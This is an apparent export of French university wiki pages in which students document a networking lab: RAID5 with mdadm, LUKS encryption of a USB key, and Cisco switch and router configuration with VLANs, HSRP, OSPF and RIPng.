   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51377</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51377"/>
				<updated>2019-11-28T18:02:41Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Création de notre machine virtuelle XEN */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
